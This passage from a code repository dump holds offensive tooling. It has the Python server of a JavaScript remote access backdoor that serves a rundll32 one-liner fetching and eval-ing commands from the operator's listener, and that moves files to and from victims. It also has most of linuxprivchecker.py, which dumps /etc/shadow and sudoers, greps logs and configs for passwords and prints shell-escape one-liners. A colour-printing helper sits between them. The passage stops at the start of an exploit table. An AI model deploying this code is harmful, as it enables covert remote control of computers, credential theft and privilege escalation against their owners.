263 | elif response_message.strip().lower() == "exit": 264 | print; caution("OK, sending kill command to Client...") 265 | response_message = "cmd /c taskkill /f /im rundll32.exe"; 266 | pad(); caution("Hit CTRL+C to kill server....") 267 | 268 | elif "/uploadpath" == self.path: 269 | lpath = raw_input(red("$")+white("(")+blue("Enter Full Path for Local File to Upload")+white(")")+red(">")+white(" ")); 270 | myHandler.upload_path = lpath; 271 | caution("Setting local upload path to: %s" % myHandler.upload_path) 272 | destination_path = raw_input(red("$")+white("(")+blue("Enter Remote Path to Write Uploaded Content")+white(")")+red(">")+white(" ")); 273 | response_message = destination_path.strip(); 274 | 275 | elif "/uploaddata" == self.path: 276 | response_message = open(myHandler.upload_path, 'rb+').read(); 277 | myHandler.upload_path = ""; 278 | 279 | elif "/hook" == self.path: 280 | good("Hooking Client: %s" % str(self.client_address[0])); 281 | content_type = "text/html"; 282 | response_message = jsrat(); 283 | response_message = """ 284 | 285 | 286 | new document 287 | 288 | 289 | 290 | 291 | 292 | 293 | 300 | 301 | """ 302 | 303 | elif "/wtf" == self.path: 304 | good("Client Command Query from: %s" % str(self.client_address[0])); 305 | response_message = """ 306 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://"""+bind_ip+":"+str(listener_port)+srv_url+"""",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}""" 307 | print cyan(response_message + "\n"); 308 | 309 | # Send the built response back to client 310 | self.send_response(200); 311 | self.send_header('Content-type',content_type); 312 | self.end_headers(); 313 | self.wfile.write(response_message); 314 | 315 | 316 | def do_POST(self): 317 | """ 318 | Handle any POST requests coming into our server 319 | """ 320 | if "/rat" == self.path: 321 | content_len = int(self.headers.getheader('content-length', 0)) 322 | post_body = self.rfile.read(content_len) 323 | print cyan(post_body); 324 | if post_body == "[No Output]": 325 | print 326 | self.send_response(200); 327 | self.send_header('Content-type','text/plain'); 328 | self.end_headers(); 329 | 330 | elif "/download" == self.path: 331 | content_len = int(self.headers.getheader('content-length', 0)) 332 | post_body = self.rfile.read(content_len) 333 | fname = raw_input(red("$")+white("(")+blue("Enter Filename to Save in ./loot/")+white(")")+red(">")+white(" ")); 334 | try: 335 | loot_file = outdir.strip()+fname.strip(); 336 | fh = open(loot_file, 'wb+') 337 | fh.write(post_body) 338 | fh.close() 339 | pad(); good("Successfully Saved To: %s\n" % loot_file.replace(home, "./")) 340 | except Exception, e: 341 | error("Problem saving content to:") 342 | pad(); bad("%s" % loot_file.replace(home, "./")) 343 | pad(); pad(); bad(str(e)); 344 | self.send_response(200); 345 | self.send_header('Content-type','text/plain'); 346 | self.end_headers(); 347 | else: 348 | caution("%s - Snooper detected..." % str(self.client_address[0])); 349 | pad(); caution("=> %s" % self.path); 350 | self.send_error(404); 351 | 352 | 353 | def main(): 354 | """ 355 | Establish our base web server and initiate the event loop to drive things 356 | 357 | 1 - Overrides custom handler path for URL to initiate things 358 | 2 - Binds socket to ip and port, and then maps to our custom handler 359 | 3 - Starts endless event loop & pass off for myHandler to handle requests 360 | """ 361 | try: 362 | print 363 | global httpd; 364 | myHandler.js_load_path = srv_url; 365 | httpd = SocketServer.TCPServer((bind_ip, listener_port), myHandler); 366 | status("Web Server Started on Port: %d" % listener_port); 367 | status("Awaiting Client Connection to: http://%s:%s%s" % (bind_ip, listener_port, srv_url)); 368 | pad(); status("Client Command at: http://%s:%s/wtf" % (bind_ip, listener_port)); 369 | pad(); status("Browser Hook Set at: http://%s:%s/hook\n" % (bind_ip, listener_port)); 370 | caution("Hit CTRL+C to Stop the Server at any time...\n"); 371 | httpd.serve_forever(); 372 | except socket.error, e: 373 | error('Try again in 30 seconds or so...') 374 | pad(); bad('Socket Error:\n\t%s\n' % e) 375 | except KeyboardInterrupt: 376 | print '' 377 | error("CTRL+C Interupt Detected!"); 378 | pad(); bad("Shutting Down Web Server...\n"); 379 | httpd.shutdown; 380 | 381 | 382 | 383 | # Parse Arguments/Options 384 | parser = optparse.OptionParser(banner(), version="%prog v0.01b"); 385 | parser.add_option("-i", "--ip", dest="ip", default=None, type="string", help="IP to Bind Server to (i.e. 192.168.0.69)"); 386 | parser.add_option("-p", "--port", dest="port", default=None, type="int", help="Port to Run Server on"); 387 | parser.add_option("-u", "--url", dest="url", default="/connect", type="string", help="URL to Initiate Client Connection (default: /connect)"); 388 | parser.add_option("-f", "--find-ip", action="count", default=0, dest="fip", help="Display Current Internal and External IP Addresses"); 389 | parser.add_option("-v", action="count", default=0, dest="verbose", help="Enable Verbose Output"); 390 | (options, args) = parser.parse_args(); 391 | 392 | # Make sure we got necessary arguments 393 | args = sys.argv[1:]; 394 | if not args: 395 | print ""; 396 | parser.print_help(); 397 | print; 398 | sys.exit(); 399 | 400 | if options.fip: 401 | print; status("Checking IP....") 402 | good("Internal IP: %s" % internal_ip()) 403 | good("External IP: %s\n\n" % external_ip()) 404 | sys.exit(); 405 | 406 | # Establish IP to bind our web server to (i.e. 127.0.0.1||192.168.0.69||10.10.10.10) 407 | if args and options.ip == None: 408 | print ' '; 409 | error("Missing Argument: --ip IP"); 410 | sys.stdout.write(' '); 411 | error("You need to provide the IP to bind server to!\n"); 412 | parser.print_help(); 413 | print; 414 | sys.exit(); 415 | else: 416 | bind_ip = options.ip; 417 | 418 | # Establish listner port for our web server (privs needed for low ports < 1024) 419 | if args and options.port == None: 420 | print ' '; 421 | error("Missing Argument: --port PORTNUMBER"); 422 | sys.stdout.write(' '); 423 | error("You need to provide the port to listen on!\n"); 424 | parser.print_help(); 425 | print; 426 | sys.exit(); 427 | else: 428 | listener_port = options.port; 429 | 430 | # Establish system based file seperator 431 | if os.name == 'nt' or sys.platform.startswith('win'): 432 | delimiter = "\\"; 433 | else: 434 | delimiter = "/"; 435 | 436 | srv_url = options.url; # The URL path to start client initiation on 437 | verbose = options.verbose; # Enable verbose output for debugging purposes 438 | home = os.path.dirname(os.path.abspath(__file__)) + delimiter; # Home dir 439 | outdir = home + "loot" + delimiter; # Output directory to save content 440 | if not os.path.isfile(outdir) and not os.path.isdir(outdir): 441 | os.mkdir(outdir); # Create output directory if it doesn't exist 442 | 443 | 444 | # Time for the magic show 445 | if __name__ == "__main__": 446 | try: 447 | main(); 448 | 449 | except KeyboardInterrupt: 450 | print "\n"; 451 | print red("[") + white("WARNING") + red("]") + white(" CTRL+C, closing session...\n\n"); 452 | sys.exit(); 453 | -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat/classes/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat/classes/colors.py: -------------------------------------------------------------------------------- 1 | # 2 | # colors.py 3 | # 4 | # Color Code Functions in Python 5 | # Works on Winblows or *nix 6 | # 7 | # By: torBot 8 | # 9 | # Use it like a module & import the available functions, then call as you like: 10 | # from colors import * 11 | # status("This is a status message") 12 | # pad(); print red("This is red text") 13 | # pad(); print blue("This is blue text\n") 14 | # caution("Cautionary Message") 15 | # pad() 16 | # error("This is an error message\n\n") 17 | # 18 | 19 | import os, sys 20 | from ctypes import Structure, c_short, c_ushort, byref 21 | 22 | if os.name == 'nt' or sys.platform.startswith('win'): 23 | from ctypes import windll, Structure, c_short, c_ushort, byref 24 | 25 | # Winblows Constants 26 | ################################ 27 | SHORT = c_short 28 | WORD = c_ushort 29 | 30 | # winbase.h 31 | STD_INPUT_HANDLE = -10 32 | STD_OUTPUT_HANDLE = -11 33 | STD_ERROR_HANDLE = -12 34 | 35 | # wincon.h structs 36 | class COORD(Structure): 37 | _fields_ = [ ("X", SHORT), ("Y", SHORT)] 38 | 39 | class SMALL_RECT(Structure): 40 | _fields_ = [("Left", SHORT), ("Top", SHORT), 41 | ("Right", SHORT), ("Bottom", SHORT)] 42 | 43 | class CONSOLE_SCREEN_BUFFER_INFO(Structure): 44 | _fields_ = [ 45 | ("dwSize", COORD), ("dwCursorPosition", COORD), 46 | ("wAttributes", WORD), ("srWindow", SMALL_RECT), 47 | ("dwMaximumWindowSize", COORD)] 48 | 49 | 50 | # OS Color Definitions & Setup 51 | ################################ 52 | if os.name == 'nt' or sys.platform.startswith('win'): 53 | stdout_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) 54 | SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute 55 | GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo 56 | 57 | # wincon.h 58 | DIM = 0x00 # dim 59 | RS = "" # reset (?) 60 | HC = 0x08 # hicolor 61 | BHC = 0x80 # background hicolor 62 | UL = "" # underline (no workie on winblows) 63 | INV = "" # inverse background and foreground (no workie on winblows) 64 | FBLK = 0x0000 # foreground black 65 | FBLK = 0x0008 # foreground grey 66 | FRED = 0x0004 # foreground red 67 | FGRN = 0x0002 # foreground green 68 | FYEL = 0x0006 # foreground yellow 69 | FBLU = 0x0001 # foreground blue 70 | FMAG = 0x0005 # foreground magenta 71 | FCYN = 0x0003 # foreground cyan 72 | FWHT = 0x0007 # foreground white (grey) 73 | BBLK = 0x0000 # background black 74 | BBLK = 0x0080 # background grey 75 | BRED = 0x0040 # background red 76 | BGRN = 0x0020 # background green 77 | BYEL = 0x0060 # background yellow 78 | BBLU = 0x0010 # background blue 79 | BMAG = 0x0050 # background magenta 80 | BCYN = 0x0030 # background cyan 81 | BWHT = 0x0070 # background white (grey) 82 | else: 83 | # ANSI color code escapes, for *nix 84 | DIM = "" # dim (no workie) 85 | RS="\033[0m" # reset 86 | HC="\033[1m" # hicolor 87 | UL="\033[4m" # underline 88 | INV="\033[7m" # inverse background and foreground 89 | FBLK="\033[30m" # foreground black 90 | FRED="\033[31m" # foreground red 91 | FGRN="\033[32m" # foreground green 92 | FYEL="\033[33m" # foreground yellow 93 | FBLU="\033[34m" # foreground blue 94 | FMAG="\033[35m" # foreground magenta 95 | FCYN="\033[36m" # foreground cyan 96 | FWHT="\033[37m" # foreground white 97 | BBLK="\033[40m" # background black 98 | BRED="\033[41m" # background red 99 | BGRN="\033[42m" # background green 100 | BYEL="\033[43m" # background yellow 101 | BBLU="\033[44m" # background blue 102 | BMAG="\033[45m" # background magenta 103 | BCYN="\033[46m" # background cyan 104 | BWHT="\033[47m" # background white 105 | 106 | def get_text_attr(): 107 | """ 108 | Returns the character attributes (colors) of the console screen buffer. 109 | 110 | Used for windows only 111 | """ 112 | if os.name == 'nt' or sys.platform.startswith('win'): 113 | try: 114 | csbi = CONSOLE_SCREEN_BUFFER_INFO() 115 | GetConsoleScreenBufferInfo(stdout_handle, byref(csbi)) 116 | return csbi.wAttributes 117 | except Exception, e: 118 | pass 119 | return None 120 | 121 | 122 | def set_text_attr(color): 123 | """ 124 | Sets the character attributes (colors) of the console screen 125 | buffer. Color is a combination of foreground and background color, 126 | foreground and background intensity. 127 | 128 | Used for windows only 129 | """ 130 | if os.name == 'nt' or sys.platform.startswith('win'): 131 | try: 132 | SetConsoleTextAttribute(stdout_handle, color) 133 | return True 134 | except Exception, e: 135 | pass 136 | return False 137 | 138 | 139 | def windows_default_colors(): 140 | """ 141 | Checks and returns the current windows console color mapping 142 | Returns the necessary foreground and background code to reset later 143 | 144 | Used for windows only 145 | """ 146 | if os.name == 'nt' or sys.platform.startswith('win'): 147 | try: 148 | default_colors = get_text_attr() 149 | default_bg = default_colors & 0x0070 150 | return default_bg 151 | except Exception, e: 152 | pass 153 | return None 154 | 155 | 156 | def restore_windows_colors(default_gb): 157 | """ 158 | Set or Restore the console colors to the provided foreground + background codes 159 | Returns True or False 160 | 161 | Used for windows only 162 | """ 163 | if os.name == 'nt' or sys.platform.startswith('win'): 164 | try: 165 | set_text_attr(default_gb) 166 | return True 167 | except Exception, e: 168 | pass 169 | return False 170 | 171 | 172 | # Some Simple Print functions 173 | ############################# 174 | def pad(): 175 | """ Simple pad to make sub points easier to print """ 176 | sys.stdout.write(' ') 177 | 178 | def caution(msg): 179 | """ [*] Print a cautionary message to user """ 180 | if os.name == 'nt' or sys.platform.startswith('win'): 181 | windows_user_default_color_code = windows_default_colors() 182 | set_text_attr(FYEL | BBLK | HC | BHC) 183 | sys.stdout.write("[") 184 | set_text_attr(FWHT | BBLK | HC | BHC) 185 | sys.stdout.write("*") 186 | set_text_attr(FYEL | BBLK | HC | BHC) 187 | sys.stdout.write("] ") 188 | set_text_attr(FWHT | BBLK | HC | BHC) 189 | sys.stdout.write(str(msg) + "\n") 190 | restore_windows_colors(windows_user_default_color_code) 191 | else: 192 | print HC + FYEL + "[" + FWHT + "-" + FYEL + "] " + FWHT + str( msg ) + RS 193 | 194 | 195 | def good( msg ): 196 | """ [*] Print a success message to user """ 197 | if os.name == 'nt' or sys.platform.startswith('win'): 198 | windows_user_default_color_code = windows_default_colors() 199 | set_text_attr(FGRN | BBLK | HC | BHC) 200 | sys.stdout.write("[") 201 | set_text_attr(FWHT | BBLK | HC | BHC) 202 | sys.stdout.write("*") 203 | set_text_attr(FGRN | BBLK | HC | BHC) 204 | sys.stdout.write("] ") 205 | set_text_attr(FWHT | BBLK | HC | BHC) 206 | sys.stdout.write(str(msg) + "\n") 207 | restore_windows_colors(windows_user_default_color_code) 208 | else: 209 | print HC + FGRN + "[" + FWHT + "*" + FGRN + "] " + FWHT + str( msg ) + RS 210 | 211 | 212 | def bad( msg ): 213 | """ [x] Print a warning or bad message to user """ 214 | if os.name == 'nt' or sys.platform.startswith('win'): 215 | windows_user_default_color_code = windows_default_colors() 216 | set_text_attr(FRED | BBLK | HC | BHC) 217 | sys.stdout.write("[") 218 | set_text_attr(FWHT | BBLK | HC | BHC) 219 | sys.stdout.write("x") 220 | set_text_attr(FRED | BBLK | HC | BHC) 221 | sys.stdout.write("] ") 222 | set_text_attr(FWHT | BBLK | HC | BHC) 223 | sys.stdout.write(str(msg) + "\n") 224 | restore_windows_colors(windows_user_default_color_code) 225 | else: 226 | print HC + FRED + "[" + FWHT + "x" + FRED + "] " + FWHT + str( msg ) + RS 227 | 228 | 229 | def status(msg ): 230 | """ [*] Print a status message to user """ 231 | if os.name == 'nt' or sys.platform.startswith('win'): 232 | windows_user_default_color_code = windows_default_colors() 233 | set_text_attr(FBLU | BBLK | HC | BHC) 234 | sys.stdout.write("[") 235 | set_text_attr(FWHT | BBLK | HC | BHC) 236 | sys.stdout.write("*") 237 | set_text_attr(FBLU | BBLK | HC | BHC) 238 | sys.stdout.write("] ") 239 | set_text_attr(FWHT | BBLK | HC | BHC) 240 | sys.stdout.write(str(msg) + "\n") 241 | restore_windows_colors(windows_user_default_color_code) 242 | else: 243 | print HC + FBLU + "[" + FWHT + "*" + FBLU + "] " + FWHT + str( msg ) + RS 244 | 245 | 246 | def error( msg ): 247 | """ [ERROR] Print an ERROR message to user """ 248 | if os.name == 'nt' or sys.platform.startswith('win'): 249 | windows_user_default_color_code = windows_default_colors() 250 | set_text_attr(FRED | BBLK | HC | BHC) 251 | sys.stdout.write("[") 252 | set_text_attr(FWHT | BBLK | HC | BHC) 253 | sys.stdout.write("ERROR") 254 | set_text_attr(FRED | BBLK | HC | BHC) 255 | sys.stdout.write("] ") 256 | set_text_attr(FWHT | BBLK | HC | BHC) 257 | sys.stdout.write(str(msg) + "\n") 258 | restore_windows_colors(windows_user_default_color_code) 259 | else: 260 | print HC + FRED + "[" + FWHT + "ERROR" + FRED + "] " + FWHT + str( msg ) + RS 261 | 262 | 263 | def underline( msg ): 264 | """ Underline message string (no workie on windows) """ 265 | if os.name == 'nt' or sys.platform.startswith('win'): 266 | return str(msg) 267 | return UL + str(msg) + RS 268 | 269 | 270 | # General Colorize Text Wrappers 271 | ################################ 272 | def blue( msg ): 273 | """ Print BLUE Colored String """ 274 | if os.name == 'nt' or sys.platform.startswith('win'): 275 | windows_user_default_color_code = windows_default_colors() 276 | set_text_attr(FBLU | BBLK | HC | BHC) 277 | sys.stdout.write(str(msg)) 278 | restore_windows_colors(windows_user_default_color_code) 279 | else: 280 | return HC + FBLU + str(msg) + RS 281 | 282 | 283 | def cyan( msg ): 284 | """ Print CYAN Colored String """ 285 | if os.name == 'nt' or sys.platform.startswith('win'): 286 | windows_user_default_color_code = windows_default_colors() 287 | set_text_attr(FCYN | BBLK | HC | BHC) 288 | sys.stdout.write(str(msg)) 289 | restore_windows_colors(windows_user_default_color_code) 290 | else: 291 | return HC + FCYN + str(msg) + RS 292 | 293 | 294 | def green( msg ): 295 | """ Print GREEN Colored String """ 296 | if os.name == 'nt' or sys.platform.startswith('win'): 297 | windows_user_default_color_code = windows_default_colors() 298 | set_text_attr(FGRN | BBLK | HC | BHC) 299 | sys.stdout.write(str(msg)) 300 | restore_windows_colors(windows_user_default_color_code) 301 | else: 302 | return HC + FGRN + str(msg) + RS 303 | 304 | def magenta(msg): 305 | """ Print MAGENTA Colored String """ 306 | if os.name == 'nt' or sys.platform.startswith('win'): 307 | windows_user_default_color_code = windows_default_colors() 308 | set_text_attr(FMAG | BBLK | HC | BHC) 309 | sys.stdout.write(str(msg)) 310 | restore_windows_colors(windows_user_default_color_code) 311 | else: 312 | return HC + FMAG + str(msg) + RS 313 | 314 | 315 | def red( msg ): 316 | """ Print RED Colored String """ 317 | if os.name == 'nt' or sys.platform.startswith('win'): 318 | windows_user_default_color_code = windows_default_colors() 319 | set_text_attr(FRED | BBLK | HC | BHC) 320 | sys.stdout.write(str(msg)) 321 | restore_windows_colors(windows_user_default_color_code) 322 | else: 323 | return HC + FRED + str(msg) + RS 324 | 325 | 326 | def white( msg ): 327 | """ Print WHITE Colored String """ 328 | if os.name == 'nt' or sys.platform.startswith('win'): 329 | windows_user_default_color_code = windows_default_colors() 330 | set_text_attr(FWHT | BBLK | HC | BHC) 331 | sys.stdout.write(str(msg)) 332 | restore_windows_colors(windows_user_default_color_code) 333 | else: 334 | return HC + FWHT + str(msg) + RS 335 | 336 | 337 | def yellow(msg ): 338 | """ Print YELLOW Colored String """ 339 | if os.name == 'nt' or sys.platform.startswith('win'): 340 | windows_user_default_color_code = windows_default_colors() 341 | set_text_attr(FYEL | BBLK | HC | BHC) 342 | sys.stdout.write(str(msg)) 343 | restore_windows_colors(windows_user_default_color_code) 344 | else: 345 | return HC + FYEL + str(msg) + RS 346 | -------------------------------------------------------------------------------- /linuxprivchecker.py: -------------------------------------------------------------------------------- 1 | #!/usr/env python 2 | 3 | ############################################################################################################### 4 | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script 5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 | ##------------------------------------------------------------------------------------------------------------- 7 | ## [Details]: 8 | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 9 | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 10 | ## passwords and applicable exploits. 11 | ##------------------------------------------------------------------------------------------------------------- 12 | ## [Warning]: 13 | ## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates, 14 | ## I did not write it to be efficient and in some cases you may find the functions may not produce the desired 15 | ## results. For example, the function that links packages to running processes is based on keywords and will 16 | ## not always be accurate. Also, the exploit list included in this function will need to be updated over time. 17 | ## Feel free to change or improve it any way you see fit. 18 | ##------------------------------------------------------------------------------------------------------------- 19 | ## [Modification, Distribution, and Attribution]: 20 | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original 21 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 22 | ## worth anything anyway :) 23 | ############################################################################################################### 24 | 25 | # conditional import for older versions of python not compatible with subprocess 26 | try: 27 | import subprocess as sub 28 | compatmode = 0 # newer version of python, no need for compatibility mode 29 | except ImportError: 30 | import os # older version of python, need to use os instead 31 | compatmode = 1 32 | 33 | # title / formatting 34 | bigline = "=================================================================================================" 35 | smlline = "-------------------------------------------------------------------------------------------------" 36 | 37 | print bigline 38 | print "LINUX PRIVILEGE ESCALATION CHECKER" 39 | print bigline 40 | print 41 | 42 | # loop through dictionary, execute the commands, store the results, return updated dict 43 | def execCmd(cmdDict): 44 | for item in cmdDict: 45 | cmd = cmdDict[item]["cmd"] 46 | if compatmode == 0: # newer version of python, use preferred subprocess 47 | out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate() 48 | results = out.split('\n') 49 | else: # older version of python, use os.popen 50 | echo_stdout = os.popen(cmd, 'r') 51 | results = echo_stdout.read().split('\n') 52 | cmdDict[item]["results"]=results 53 | return cmdDict 54 | 55 | # print results for each previously executed command, no return value 56 | def printResults(cmdDict): 57 | for item in cmdDict: 58 | msg = cmdDict[item]["msg"] 59 | results = cmdDict[item]["results"] 60 | print "[+] " + msg 61 | for result in results: 62 | if result.strip() != "": 63 | print " " + result.strip() 64 | print 65 | return 66 | 67 | def writeResults(msg, results): 68 | f = open("privcheckout.txt", "a"); 69 | f.write("[+] " + str(len(results)-1) + " " + msg) 70 | for result in results: 71 | if result.strip() != "": 72 | f.write(" " + result.strip()) 73 | f.close() 74 | return 75 | 76 | # Basic system info 77 | print "[*] GETTING BASIC SYSTEM INFO...\n" 78 | 79 | results=[] 80 | 81 | sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results}, 82 | "KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results}, 83 | "HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results} 84 | } 85 | 86 | sysInfo = execCmd(sysInfo) 87 | printResults(sysInfo) 88 | 89 | # Networking Info 90 | 91 | print "[*] GETTING NETWORKING INFO...\n" 92 | 93 | netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results}, 94 | "ROUTE":{"cmd":"route", "msg":"Route", "results":results}, 95 | "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results} 96 | } 97 | 98 | netInfo = execCmd(netInfo) 99 | printResults(netInfo) 100 | 101 | # File System Info 102 | print "[*] GETTING FILESYSTEM INFO...\n" 103 | 104 | driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results}, 105 | "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results} 106 | } 107 | 108 | driveInfo = execCmd(driveInfo) 109 | printResults(driveInfo) 110 | 111 | # Scheduled Cron Jobs 112 | cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results}, 113 | "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results} 114 | } 115 | 116 | cronInfo = execCmd(cronInfo) 117 | printResults(cronInfo) 118 | 119 | # User Info 120 | print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" 121 | 122 | userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results}, 123 | "ID":{"cmd":"id","msg":"Current User ID", "results":results}, 124 | "ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results}, 125 | "SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results}, 126 | "HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results}, 127 | "ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results}, 128 | "SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results}, 129 | "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results} 130 | } 131 | 132 | userInfo = execCmd(userInfo) 133 | printResults(userInfo) 134 | 135 | if "root" in userInfo["ID"]["results"][0]: 136 | print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n" 137 | 138 | # File/Directory Privs 139 | print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" 140 | 141 | fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results}, 142 | "WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results}, 143 | "WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results}, 144 | "SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results}, 145 | "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results} 146 | } 147 | 148 | fdPerms = execCmd(fdPerms) 149 | printResults(fdPerms) 150 | 151 | pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results}, 152 | "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results}, 153 | "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results} 154 | } 155 | 156 | pwdFiles = execCmd(pwdFiles) 157 | printResults(pwdFiles) 158 | 159 | # Processes and Applications 160 | print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" 161 | 162 | if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]: 163 | getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian 164 | else: 165 | getPkgs = "rpm -qa | sort -u" # RH/other 166 | 167 | getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results}, 168 | "PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results} 169 | } 170 | 171 | getAppProc = execCmd(getAppProc) 172 | printResults(getAppProc) # comment to reduce output 173 | 174 | otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results}, 175 | "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results}, 176 | "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results} 177 | } 178 | 179 | otherApps = execCmd(otherApps) 180 | printResults(otherApps) 181 | 182 | print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" 183 | 184 | # find the package information for the processes currently running 185 | # under root or another super user 186 | 187 | procs = getAppProc["PROCS"]["results"] 188 | pkgs = getAppProc["PKGS"]["results"] 189 | supusers = userInfo["SUPUSERS"]["results"] 190 | procdict = {} # dictionary to hold the processes running as super users 191 | 192 | for proc in procs: # loop through each process 193 | relatedpkgs = [] # list to hold the packages related to a process 194 | try: 195 | for user in supusers: # loop through the known super users 196 | if (user != "") and (user in proc): # if the process is being run by a super user 197 | procname = proc.split(" ")[4] # grab the process name 198 | if "/" in procname: 199 | splitname = procname.split("/") 200 | procname = splitname[len(splitname)-1] 201 | for pkg in pkgs: # loop through the packages 202 | if not len(procname) < 3: # name too short to get reliable package results 203 | if procname in pkg: 204 | if procname in procdict: 205 | relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list 206 | if pkg not in relatedpkgs: 207 | relatedpkgs.append(pkg) # add pkg to the list 208 | procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry 209 | except: 210 | pass 211 | 212 | for key in procdict: 213 | print " " + key # print the process name 214 | try: 215 | if not procdict[key][0] == "": # only print the rest if related packages were found 216 | print " Possible Related Packages: " 217 | for entry in procdict[key]: 218 | print " " + entry # print each related package 219 | except: 220 | pass 221 | 222 | # EXPLOIT ENUMERATION 223 | 224 | # First discover the avaialable tools 225 | print 226 | print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n" 227 | 228 | devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}} 229 | devTools = execCmd(devTools) 230 | printResults(devTools) 231 | 232 | print "[+] Related Shell Escape Sequences...\n" 233 | escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]} 234 | for cmd in escapeCmd: 235 | for result in devTools["TOOLS"]["results"]: 236 | if cmd in result: 237 | for item in escapeCmd[cmd]: 238 | print " " + cmd + "-->\t" + item 239 | print 240 | print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n" 241 | 242 | # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB) 243 | # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os' 244 | sploits= { "2.2.x-2.4.x ptrace kmod local 